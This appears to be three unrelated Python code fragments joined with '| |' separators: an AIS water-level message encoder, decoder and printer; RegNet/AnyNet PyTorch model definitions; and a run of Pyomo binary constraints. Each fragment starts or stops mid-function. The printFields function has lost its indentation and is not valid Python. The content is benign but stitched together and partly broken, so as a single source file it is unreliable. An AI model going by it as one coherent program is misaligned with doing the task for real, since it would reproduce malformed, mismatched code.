    if 'datum' in params:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=params['datum']),5))
    else:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=31),5))
    # sigma: 7 bits, default 127 (unknown).
    if 'sigma' in params:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=params['sigma']),7))
    else:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=127),7))
    # source: 3 bits, default 0.
    if 'source' in params:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=params['source']),3))
    else:
        bvList.append(binary.setBitVectorSize(BitVector(intVal=0),3))
    # Concatenate all fields into one 149-bit payload.
    return binary.joinBV(bvList)
def decode(bv, validate=False):
    '''Unpack a waterlevel message.
    Fields in params:
      - MessageID(uint): AIS message number.  Must be 8 (field automatically set to "8")
      - RepeatIndicator(uint): Indicated how many times a message has been repeated
      - UserID(uint): Unique ship identification number (MMSI)
      - Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
      - dac(uint): Designated Area Code (field automatically set to "366")
      - fid(uint): Functional Identifier (field automatically set to "63")
      - month(uint): Time the measurement represents month 1..12
      - day(uint): Time the measurement represents day of the month 1..31
      - hour(uint): Time the measurement represents UTC hours 0..23
      - min(uint): Time the measurement represents minutes
      - stationid(aisstr6): Character identifier of the station.  Usually a number.
      - waterlevel(int): Water level in centimeters
      - datum(uint): What reference datum applies to the value
      - sigma(uint): Standard deviation of 1 second samples used to compute the water level height.  FIX: is this the correct description of sigma?
      - source(uint): How the water level was derived
    @type bv: BitVector
    @param bv: Bits defining a message
    @param validate: Set to true to cause checking to occur.  Runs slower.  FIX: not implemented.
    @rtype: dict
    @return: params
    '''
    #Would be nice to check the bit count here..
    #if validate:
    #    assert (len(bv)==FIX: SOME NUMBER)
    # Bit offsets mirror the widths written by encode(); constant fields
    # (MessageID/Spare/dac/fid) are filled in without reading the bits.
    r = {}
    r['MessageID']=8
    r['RepeatIndicator']=int(bv[6:8])
    r['UserID']=int(bv[8:38])
    r['Spare']=0
    r['dac']=366
    r['fid']=63
    r['month']=int(bv[56:60])
    r['day']=int(bv[60:65])
    r['hour']=int(bv[65:70])
    r['min']=int(bv[70:76])
    r['stationid']=aisstring.decode(bv[76:118])
    # waterlevel is the only signed field (16 bits, two's complement).
    r['waterlevel']=binary.signedIntFromBV(bv[118:134])
    r['datum']=int(bv[134:139])
    r['sigma']=int(bv[139:146])
    r['source']=int(bv[146:149])
    return r
# Per-field decoders: each extracts a single field from a full message
# BitVector using the same offsets as decode(). Constant fields return their
# fixed values without touching bv. 'validate' is accepted for interface
# uniformity but unused.
def decodeMessageID(bv, validate=False):
    return 8
def decodeRepeatIndicator(bv, validate=False):
    return int(bv[6:8])
def decodeUserID(bv, validate=False):
    return int(bv[8:38])
def decodeSpare(bv, validate=False):
    return 0
def decodedac(bv, validate=False):
    return 366
def decodefid(bv, validate=False):
    return 63
def decodemonth(bv, validate=False):
    return int(bv[56:60])
def decodeday(bv, validate=False):
    return int(bv[60:65])
def decodehour(bv, validate=False):
    return int(bv[65:70])
def decodemin(bv, validate=False):
    return int(bv[70:76])
def decodestationid(bv, validate=False):
    return aisstring.decode(bv[76:118])
def decodewaterlevel(bv, validate=False):
    return binary.signedIntFromBV(bv[118:134])
def decodedatum(bv, validate=False):
    return int(bv[134:139])
def decodesigma(bv, validate=False):
    return int(bv[139:146])
def decodesource(bv, validate=False):
    return int(bv[146:149])
def printHtml(params, out=sys.stdout):
    """Write the waterlevel message fields as an HTML table.

    Fields absent from params get a row with no value cells. The
    RepeatIndicator/datum/source rows consult *DecodeLut lookup tables —
    NOTE(review): those LUTs are defined elsewhere in this module; a missing
    LUT raises NameError at runtime. Generated code; row order is fixed.
    """
    out.write("<h3>waterlevel</h3>\n")
    out.write("<table border=\"1\">\n")
    out.write("<tr bgcolor=\"orange\">\n")
    out.write("<th align=\"left\">Field Name</th>\n")
    out.write("<th align=\"left\">Type</th>\n")
    out.write("<th align=\"left\">Value</th>\n")
    out.write("<th align=\"left\">Value in Lookup Table</th>\n")
    out.write("<th align=\"left\">Units</th>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>MessageID</td>\n")
    out.write("<td>uint</td>\n")
    if 'MessageID' in params:
        out.write(" <td>"+str(params['MessageID'])+"</td>\n")
        out.write(" <td>"+str(params['MessageID'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>RepeatIndicator</td>\n")
    out.write("<td>uint</td>\n")
    if 'RepeatIndicator' in params:
        out.write(" <td>"+str(params['RepeatIndicator'])+"</td>\n")
        if str(params['RepeatIndicator']) in RepeatIndicatorDecodeLut:
            out.write("<td>"+RepeatIndicatorDecodeLut[str(params['RepeatIndicator'])]+"</td>")
        else:
            out.write("<td><i>Missing LUT entry</i></td>")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>UserID</td>\n")
    out.write("<td>uint</td>\n")
    if 'UserID' in params:
        out.write(" <td>"+str(params['UserID'])+"</td>\n")
        out.write(" <td>"+str(params['UserID'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>Spare</td>\n")
    out.write("<td>uint</td>\n")
    if 'Spare' in params:
        out.write(" <td>"+str(params['Spare'])+"</td>\n")
        out.write(" <td>"+str(params['Spare'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>dac</td>\n")
    out.write("<td>uint</td>\n")
    if 'dac' in params:
        out.write(" <td>"+str(params['dac'])+"</td>\n")
        out.write(" <td>"+str(params['dac'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>fid</td>\n")
    out.write("<td>uint</td>\n")
    if 'fid' in params:
        out.write(" <td>"+str(params['fid'])+"</td>\n")
        out.write(" <td>"+str(params['fid'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>month</td>\n")
    out.write("<td>uint</td>\n")
    if 'month' in params:
        out.write(" <td>"+str(params['month'])+"</td>\n")
        out.write(" <td>"+str(params['month'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>day</td>\n")
    out.write("<td>uint</td>\n")
    if 'day' in params:
        out.write(" <td>"+str(params['day'])+"</td>\n")
        out.write(" <td>"+str(params['day'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>hour</td>\n")
    out.write("<td>uint</td>\n")
    if 'hour' in params:
        out.write(" <td>"+str(params['hour'])+"</td>\n")
        out.write(" <td>"+str(params['hour'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>min</td>\n")
    out.write("<td>uint</td>\n")
    if 'min' in params:
        out.write(" <td>"+str(params['min'])+"</td>\n")
        out.write(" <td>"+str(params['min'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>stationid</td>\n")
    out.write("<td>aisstr6</td>\n")
    if 'stationid' in params:
        out.write(" <td>"+str(params['stationid'])+"</td>\n")
        out.write(" <td>"+str(params['stationid'])+"</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>waterlevel</td>\n")
    out.write("<td>int</td>\n")
    if 'waterlevel' in params:
        out.write(" <td>"+str(params['waterlevel'])+"</td>\n")
        out.write(" <td>"+str(params['waterlevel'])+"</td>\n")
    # Units cell is written regardless of field presence.
    out.write("<td>cm</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>datum</td>\n")
    out.write("<td>uint</td>\n")
    if 'datum' in params:
        out.write(" <td>"+str(params['datum'])+"</td>\n")
        if str(params['datum']) in datumDecodeLut:
            out.write("<td>"+datumDecodeLut[str(params['datum'])]+"</td>")
        else:
            out.write("<td><i>Missing LUT entry</i></td>")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>sigma</td>\n")
    out.write("<td>uint</td>\n")
    if 'sigma' in params:
        out.write(" <td>"+str(params['sigma'])+"</td>\n")
        out.write(" <td>"+str(params['sigma'])+"</td>\n")
    out.write("<td>cm</td>\n")
    out.write("</tr>\n")
    out.write("\n")
    out.write("<tr>\n")
    out.write("<td>source</td>\n")
    out.write("<td>uint</td>\n")
    if 'source' in params:
        out.write(" <td>"+str(params['source'])+"</td>\n")
        if str(params['source']) in sourceDecodeLut:
            out.write("<td>"+sourceDecodeLut[str(params['source'])]+"</td>")
        else:
            out.write("<td><i>Missing LUT entry</i></td>")
    out.write("</tr>\n")
    out.write("</table>\n")
def printFields(params, out=sys.stdout, format='std', fieldList=None, dbType='postgres'):
'''Print a waterlevel message to stdout.
Fields in params:
- MessageID(uint): AIS message number. Must be 8 (field automatically set to "8")
- RepeatIndicator(uint): Indicated how many times a message has been repeated
- UserID(uint): Unique ship identification number (MMSI)
- Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
- dac(uint): Designated Area Code (field automatically set to "366")
- fid(uint): Functional Identifier (field automatically set to "63")
- month(uint): Time the measurement represents month 1..12
- day(uint): Time the measurement represents day of the month 1..31
- hour(uint): Time the measurement represents UTC hours 0..23
- min(uint): Time the measurement represents minutes
- stationid(aisstr6): Character identifier of the station. Usually a number.
- waterlevel(int): Water level in centimeters
- datum(uint): What reference datum applies to the value
- sigma(uint): Standard deviation of 1 second samples used to compute the water level height. FIX: is this the correct description of sigma?
- source(uint): How the water level was derived
@param params: Dictionary of field names/values.
@param out: File like object to write to.
@rtype: stdout
@return: text to out
'''
if 'std'==format:
out.write("waterlevel:\n")
if 'MessageID' in params: out.write(" MessageID: "+str(params['MessageID'])+"\n")
if 'RepeatIndicator' in params: out.write(" RepeatIndicator: "+str(params['RepeatIndicator'])+"\n")
if 'UserID' in params: out.write(" UserID: "+str(params['UserID'])+"\n")
if 'Spare' in params: out.write(" Spare: "+str(params['Spare'])+"\n")
if 'dac' in params: out.write(" dac: "+str(params['dac'])+"\n")
if 'fid' in params: out.write(" fid: "+str(params['fid'])+"\n")
if 'month' in params: out.write(" month: "+str(params['month'])+"\n")
if 'day' in params: out.write(" day: "+str(params['day'])+"\n")
if 'hour' in params: | |
import torch
import math
import torch.nn as nn
import numpy as np
from .config import regnet_cfg
def init_weights(m):
    """Apply ResNet-style weight initialization to a single module.

    Intended for use via ``model.apply(init_weights)``. Modules other than
    Linear, Conv2d and BatchNorm2d are left untouched.
    """
    if isinstance(m, nn.Linear):
        m.weight.data.normal_(mean=0.0, std=0.01)
        m.bias.data.zero_()
    elif isinstance(m, nn.Conv2d):
        # No bias initialization: convs here carry no bias since BN follows.
        kernel_area = m.kernel_size[0] * m.kernel_size[1]
        fan_out = kernel_area * m.out_channels
        m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))
    elif isinstance(m, nn.BatchNorm2d):
        # Optionally zero-init the gamma of the final BN of a residual branch
        # (marked with the 'final_bn' attribute) when the config asks for it.
        zero_gamma = (
            hasattr(m, "final_bn")
            and m.final_bn
            and regnet_cfg.BN.ZERO_INIT_FINAL_GAMMA
        )
        m.weight.data.fill_(0.0 if zero_gamma else 1.0)
        m.bias.data.zero_()
def get_stem_fun(stem_type):
    """Look up the stem constructor registered under ``stem_type``.

    Raises AssertionError for an unknown stem type.
    """
    stem_funs = {
        "res_stem_cifar": ResStemCifar,
        "res_stem_in": ResStemIN,
        "simple_stem_in": SimpleStemIN,
    }
    stem_fun = stem_funs.get(stem_type)
    # Registered values are all classes, so None can only mean "unknown key".
    assert stem_fun is not None, "Stem type '{}' not supported".format(stem_type)
    return stem_fun
def get_block_fun(block_type):
    """Look up the block constructor registered under ``block_type``.

    Raises AssertionError for an unknown block type.
    """
    block_funs = {
        "vanilla_block": VanillaBlock,
        "res_basic_block": ResBasicBlock,
        "res_bottleneck_block": ResBottleneckBlock,
    }
    block_fun = block_funs.get(block_type)
    # Registered values are all classes, so None can only mean "unknown key".
    assert block_fun is not None, "Block type '{}' not supported".format(block_type)
    return block_fun
class AnyHead(nn.Module):
    """AnyNet head: global average pooling followed by a linear classifier.

    Args:
        w_in: number of input feature channels.
        nc: number of output classes.
    """

    def __init__(self, w_in, nc):
        super(AnyHead, self).__init__()
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(w_in, nc, bias=True)

    def forward(self, x):
        # (N, C, H, W) -> (N, C, 1, 1) -> (N, C) -> (N, nc)
        pooled = self.avg_pool(x)
        flat = pooled.view(pooled.size(0), -1)
        return self.fc(flat)
class VanillaBlock(nn.Module):
    """Vanilla block: [3x3 conv, BN, Relu] x2"""
    def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
        # bm/gw/se_r exist only so all block types share one signature.
        assert (
            bm is None and gw is None and se_r is None
        ), "Vanilla block does not support bm, gw, and se_r options"
        super(VanillaBlock, self).__init__()
        self.construct(w_in, w_out, stride)
    def construct(self, w_in, w_out, stride):
        # NOTE: forward() iterates self.children(), so the attribute
        # registration order below IS the execution order — do not reorder.
        # 3x3, BN, ReLU
        self.a = nn.Conv2d(
            w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
        )
        self.a_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
        # 3x3, BN, ReLU
        self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
        self.b_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.b_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
    def forward(self, x):
        # Apply child modules sequentially, in registration order.
        for layer in self.children():
            x = layer(x)
        return x
class BasicTransform(nn.Module):
    """Basic transformation: [3x3 conv, BN, Relu] x2"""
    def __init__(self, w_in, w_out, stride):
        super(BasicTransform, self).__init__()
        self.construct(w_in, w_out, stride)
    def construct(self, w_in, w_out, stride):
        # NOTE: forward() iterates self.children(); registration order below
        # is the execution order — do not reorder.
        # 3x3, BN, ReLU
        self.a = nn.Conv2d(
            w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
        )
        self.a_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
        # 3x3, BN (no trailing ReLU: the residual add comes before activation)
        self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
        self.b_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        # Mark the branch's last BN so init_weights can zero-init its gamma.
        self.b_bn.final_bn = True
    def forward(self, x):
        for layer in self.children():
            x = layer(x)
        return x
class ResBasicBlock(nn.Module):
    """Residual basic block: x + F(x), F = basic transform"""
    def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
        # bm/gw/se_r exist only so all block types share one signature.
        assert (
            bm is None and gw is None and se_r is None
        ), "Basic transform does not support bm, gw, and se_r options"
        super(ResBasicBlock, self).__init__()
        self.construct(w_in, w_out, stride)
    def _add_skip_proj(self, w_in, w_out, stride):
        # 1x1 projection to match the residual branch's shape.
        self.proj = nn.Conv2d(
            w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
        )
        self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
    def construct(self, w_in, w_out, stride):
        # Use skip connection with projection if shape changes
        self.proj_block = (w_in != w_out) or (stride != 1)
        if self.proj_block:
            self._add_skip_proj(w_in, w_out, stride)
        self.f = BasicTransform(w_in, w_out, stride)
        self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
    def forward(self, x):
        if self.proj_block:
            x = self.bn(self.proj(x)) + self.f(x)
        else:
            x = x + self.f(x)
        x = self.relu(x)
        return x
class SE(nn.Module):
    """Squeeze-and-Excitation (SE) block"""
    def __init__(self, w_in, w_se):
        super(SE, self).__init__()
        self.construct(w_in, w_se)
    def construct(self, w_in, w_se):
        # AvgPool: squeeze spatial dims to 1x1.
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        # FC, Activation, FC, Sigmoid — excitation MLP implemented as 1x1 convs.
        self.f_ex = nn.Sequential(
            nn.Conv2d(w_in, w_se, kernel_size=1, bias=True),
            nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE),
            nn.Conv2d(w_se, w_in, kernel_size=1, bias=True),
            nn.Sigmoid(),
        )
    def forward(self, x):
        # Channel-wise gating: scale x by per-channel weights in (0, 1).
        return x * self.f_ex(self.avg_pool(x))
class BottleneckTransform(nn.Module):
    """Bottlenect transformation: 1x1, 3x3, 1x1"""
    def __init__(self, w_in, w_out, stride, bm, gw, se_r):
        super(BottleneckTransform, self).__init__()
        self.construct(w_in, w_out, stride, bm, gw, se_r)
    def construct(self, w_in, w_out, stride, bm, gw, se_r):
        # NOTE: forward() iterates self.children(); registration order below
        # is the execution order — do not reorder.
        # Compute the bottleneck width (bm = bottleneck multiplier).
        w_b = int(round(w_out * bm))
        # Compute the number of groups (gw = width per group).
        num_gs = w_b // gw
        # 1x1, BN, ReLU
        self.a = nn.Conv2d(w_in, w_b, kernel_size=1, stride=1, padding=0, bias=False)
        self.a_bn = nn.BatchNorm2d(w_b, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
        # 3x3 grouped conv, BN, ReLU
        self.b = nn.Conv2d(
            w_b, w_b, kernel_size=3, stride=stride, padding=1, groups=num_gs, bias=False
        )
        self.b_bn = nn.BatchNorm2d(w_b, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.b_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
        # Squeeze-and-Excitation (SE), only when se_r is truthy.
        if se_r:
            w_se = int(round(w_in * se_r))
            self.se = SE(w_b, w_se)
        # 1x1, BN (no trailing ReLU: residual add happens before activation)
        self.c = nn.Conv2d(w_b, w_out, kernel_size=1, stride=1, padding=0, bias=False)
        self.c_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        # Mark the branch's last BN so init_weights can zero-init its gamma.
        self.c_bn.final_bn = True
    def forward(self, x):
        for layer in self.children():
            x = layer(x)
        return x
class ResBottleneckBlock(nn.Module):
    """Residual bottleneck block: x + F(x), F = bottleneck transform"""
    def __init__(self, w_in, w_out, stride, bm=1.0, gw=1, se_r=None):
        super(ResBottleneckBlock, self).__init__()
        self.construct(w_in, w_out, stride, bm, gw, se_r)
    def _add_skip_proj(self, w_in, w_out, stride):
        # 1x1 projection to match the residual branch's shape.
        self.proj = nn.Conv2d(
            w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
        )
        self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
    def construct(self, w_in, w_out, stride, bm, gw, se_r):
        # Use skip connection with projection if shape changes
        self.proj_block = (w_in != w_out) or (stride != 1)
        if self.proj_block:
            self._add_skip_proj(w_in, w_out, stride)
        self.f = BottleneckTransform(w_in, w_out, stride, bm, gw, se_r)
        self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
    def forward(self, x):
        if self.proj_block:
            x = self.bn(self.proj(x)) + self.f(x)
        else:
            x = x + self.f(x)
        x = self.relu(x)
        return x
class ResStemCifar(nn.Module):
    """ResNet stem for CIFAR."""
    def __init__(self, w_in, w_out):
        super(ResStemCifar, self).__init__()
        self.construct(w_in, w_out)
    def construct(self, w_in, w_out):
        # 3x3, BN, ReLU — stride 1, no pooling (CIFAR inputs are small).
        # forward() runs children in registration order; do not reorder.
        self.conv = nn.Conv2d(
            w_in, w_out, kernel_size=3, stride=1, padding=1, bias=False
        )
        self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
    def forward(self, x):
        for layer in self.children():
            x = layer(x)
        return x
class ResStemIN(nn.Module):
    """ResNet stem for ImageNet."""
    def __init__(self, w_in, w_out):
        super(ResStemIN, self).__init__()
        self.construct(w_in, w_out)
    def construct(self, w_in, w_out):
        # 7x7/2, BN, ReLU, 3x3/2 maxpool — overall 4x spatial downsampling.
        # forward() runs children in registration order; do not reorder.
        self.conv = nn.Conv2d(
            w_in, w_out, kernel_size=7, stride=2, padding=3, bias=False
        )
        self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
        self.pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
    def forward(self, x):
        for layer in self.children():
            x = layer(x)
        return x
class SimpleStemIN(nn.Module):
    """Simple stem for ImageNet."""
    def __init__(self, in_w, out_w):
        super(SimpleStemIN, self).__init__()
        self.construct(in_w, out_w)
    def construct(self, in_w, out_w):
        # Single 3x3/2 conv, BN, ReLU — 2x spatial downsampling.
        # forward() runs children in registration order; do not reorder.
        self.conv = nn.Conv2d(
            in_w, out_w, kernel_size=3, stride=2, padding=1, bias=False
        )
        self.bn = nn.BatchNorm2d(out_w, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
        self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
    def forward(self, x):
        for layer in self.children():
            x = layer(x)
        return x
class AnyStage(nn.Module):
    """AnyNet stage (sequence of blocks w/ the same output shape)."""
    def __init__(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
        super(AnyStage, self).__init__()
        self.construct(w_in, w_out, stride, d, block_fun, bm, gw, se_r)
    def construct(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
        # Construct the d blocks of this stage; forward() runs them in the
        # order they are registered here.
        for i in range(d):
            # Stride and w_in apply to the first block of the stage only;
            # subsequent blocks keep the stage width at stride 1.
            b_stride = stride if i == 0 else 1
            b_w_in = w_in if i == 0 else w_out
            # Construct the block (named b1..bd, 1-based).
            self.add_module(
                "b{}".format(i + 1), block_fun(b_w_in, w_out, b_stride, bm, gw, se_r)
            )
    def forward(self, x):
        for block in self.children():
            x = block(x)
        return x
class AnyNet(nn.Module):
    """AnyNet model."""
    def __init__(self, **kwargs):
        super(AnyNet, self).__init__()
        # Explicit kwargs override the global config; an empty call builds
        # the network described by regnet_cfg.ANYNET.
        if kwargs:
            self.construct(
                stem_type=kwargs["stem_type"],
                stem_w=kwargs["stem_w"],
                block_type=kwargs["block_type"],
                ds=kwargs["ds"],
                ws=kwargs["ws"],
                ss=kwargs["ss"],
                bms=kwargs["bms"],
                gws=kwargs["gws"],
                se_r=kwargs["se_r"],
                nc=kwargs["nc"],
            )
        else:
            self.construct(
                stem_type=regnet_cfg.ANYNET.STEM_TYPE,
                stem_w=regnet_cfg.ANYNET.STEM_W,
                block_type=regnet_cfg.ANYNET.BLOCK_TYPE,
                ds=regnet_cfg.ANYNET.DEPTHS,
                ws=regnet_cfg.ANYNET.WIDTHS,
                ss=regnet_cfg.ANYNET.STRIDES,
                bms=regnet_cfg.ANYNET.BOT_MULS,
                gws=regnet_cfg.ANYNET.GROUP_WS,
                se_r=regnet_cfg.ANYNET.SE_R if regnet_cfg.ANYNET.SE_ON else None,
                nc=regnet_cfg.MODEL.NUM_CLASSES,
            )
        self.apply(init_weights)
    def construct(self, stem_type, stem_w, block_type, ds, ws, ss, bms, gws, se_r, nc):
        # ds/ws/ss/bms/gws are per-stage lists: depths, widths, strides,
        # bottleneck multipliers, group widths.
        # Generate dummy bot muls and gs for models that do not use them
        bms = bms if bms else [1.0 for _d in ds]
        gws = gws if gws else [1 for _d in ds]
        # Group params by stage
        stage_params = list(zip(ds, ws, ss, bms, gws))
        # Construct the stem (forward() runs children in registration order,
        # so the stem must be registered before the stages).
        stem_fun = get_stem_fun(stem_type)
        self.stem = stem_fun(3, stem_w)
        # Construct the stages (named s1..sN)
        block_fun = get_block_fun(block_type)
        prev_w = stem_w
        for i, (d, w, s, bm, gw) in enumerate(stage_params):
            self.add_module(
                "s{}".format(i + 1), AnyStage(prev_w, w, s, d, block_fun, bm, gw, se_r)
            )
            prev_w = w
        # Construct the head — disabled here; only the final width is kept so
        # downstream code can attach its own head via self.in_planes.
        self.in_planes = prev_w
        #self.head = AnyHead(w_in=prev_w, nc=nc)
    def forward(self, x):
        for module in self.children():
            x = module(x)
        return x
def quantize_float(f, q):
    """Round ``f`` to the nearest integer multiple of ``q``.

    NOTE(review): the original docstring claimed the result is non-zero,
    but any ``f < q/2`` rounds down to 0 -- callers appear to rely on
    prior clamping to avoid that case; confirm.
    """
    return int(q * round(f / q))
def adjust_ws_gs_comp(ws, bms, gs):
    """Adjust widths and group sizes for mutual compatibility.

    Each bottleneck width (w * bm) is clamped against its group size and
    snapped to a multiple of it, then mapped back to an outer width.
    Returns the adjusted (ws, gs) lists.
    """
    adjusted_ws = []
    adjusted_gs = []
    for w, b, g in zip(ws, bms, gs):
        w_bot = int(w * b)
        # Group size can never exceed the bottleneck width.
        g = min(g, w_bot)
        # Snap the bottleneck width to a multiple of g (inlined
        # quantize_float).
        w_bot = int(round(w_bot / g) * g)
        adjusted_ws.append(int(w_bot / b))
        adjusted_gs.append(g)
    return adjusted_ws, adjusted_gs
def get_stages_from_blocks(ws, rs):
"""Gets ws/ds of network at each stage from per block | |
<= 1)
m.c764 = Constraint(expr= m.b97 - m.b103 + m.b140 <= 1)
m.c765 = Constraint(expr= m.b97 - m.b105 + m.b141 <= 1)
m.c766 = Constraint(expr= m.b97 - m.b107 + m.b142 <= 1)
m.c767 = Constraint(expr= m.b97 - m.b109 + m.b143 <= 1)
m.c768 = Constraint(expr= m.b97 - m.b111 + m.b144 <= 1)
m.c769 = Constraint(expr= m.b97 - m.b113 + m.b145 <= 1)
m.c770 = Constraint(expr= m.b97 - m.b115 + m.b146 <= 1)
m.c771 = Constraint(expr= m.b99 - m.b101 + m.b147 <= 1)
m.c772 = Constraint(expr= m.b99 - m.b103 + m.b148 <= 1)
m.c773 = Constraint(expr= m.b99 - m.b105 + m.b149 <= 1)
m.c774 = Constraint(expr= m.b99 - m.b107 + m.b150 <= 1)
m.c775 = Constraint(expr= m.b99 - m.b109 + m.b151 <= 1)
m.c776 = Constraint(expr= m.b99 - m.b111 + m.b152 <= 1)
m.c777 = Constraint(expr= m.b99 - m.b113 + m.b153 <= 1)
m.c778 = Constraint(expr= m.b99 - m.b115 + m.b154 <= 1)
m.c779 = Constraint(expr= m.b101 - m.b103 + m.b155 <= 1)
m.c780 = Constraint(expr= m.b101 - m.b105 + m.b156 <= 1)
m.c781 = Constraint(expr= m.b101 - m.b107 + m.b157 <= 1)
m.c782 = Constraint(expr= m.b101 - m.b109 + m.b158 <= 1)
m.c783 = Constraint(expr= m.b101 - m.b111 + m.b159 <= 1)
m.c784 = Constraint(expr= m.b101 - m.b113 + m.b160 <= 1)
m.c785 = Constraint(expr= m.b101 - m.b115 + m.b161 <= 1)
m.c786 = Constraint(expr= m.b103 - m.b105 + m.b162 <= 1)
m.c787 = Constraint(expr= m.b103 - m.b107 + m.b163 <= 1)
m.c788 = Constraint(expr= m.b103 - m.b109 + m.b164 <= 1)
m.c789 = Constraint(expr= m.b103 - m.b111 + m.b165 <= 1)
m.c790 = Constraint(expr= m.b103 - m.b113 + m.b166 <= 1)
m.c791 = Constraint(expr= m.b103 - m.b115 + m.b167 <= 1)
m.c792 = Constraint(expr= m.b105 - m.b107 + m.b168 <= 1)
m.c793 = Constraint(expr= m.b105 - m.b109 + m.b169 <= 1)
m.c794 = Constraint(expr= m.b105 - m.b111 + m.b170 <= 1)
m.c795 = Constraint(expr= m.b105 - m.b113 + m.b171 <= 1)
m.c796 = Constraint(expr= m.b105 - m.b115 + m.b172 <= 1)
m.c797 = Constraint(expr= m.b107 - m.b109 + m.b173 <= 1)
m.c798 = Constraint(expr= m.b107 - m.b111 + m.b174 <= 1)
m.c799 = Constraint(expr= m.b107 - m.b113 + m.b175 <= 1)
m.c800 = Constraint(expr= m.b107 - m.b115 + m.b176 <= 1)
m.c801 = Constraint(expr= m.b109 - m.b111 + m.b177 <= 1)
m.c802 = Constraint(expr= m.b109 - m.b113 + m.b178 <= 1)
m.c803 = Constraint(expr= m.b109 - m.b115 + m.b179 <= 1)
m.c804 = Constraint(expr= m.b111 - m.b113 + m.b180 <= 1)
m.c805 = Constraint(expr= m.b111 - m.b115 + m.b181 <= 1)
m.c806 = Constraint(expr= m.b113 - m.b115 + m.b182 <= 1)
m.c807 = Constraint(expr= m.b93 - m.b96 + m.b117 <= 1)
m.c808 = Constraint(expr= m.b93 - m.b98 + m.b118 <= 1)
m.c809 = Constraint(expr= m.b93 - m.b100 + m.b119 <= 1)
m.c810 = Constraint(expr= m.b93 - m.b102 + m.b120 <= 1)
m.c811 = Constraint(expr= m.b93 - m.b104 + m.b121 <= 1)
m.c812 = Constraint(expr= m.b93 - m.b106 + m.b122 <= 1)
m.c813 = Constraint(expr= m.b93 - m.b108 + m.b123 <= 1)
m.c814 = Constraint(expr= m.b93 - m.b110 + m.b124 <= 1)
m.c815 = Constraint(expr= m.b93 - m.b112 + m.b125 <= 1)
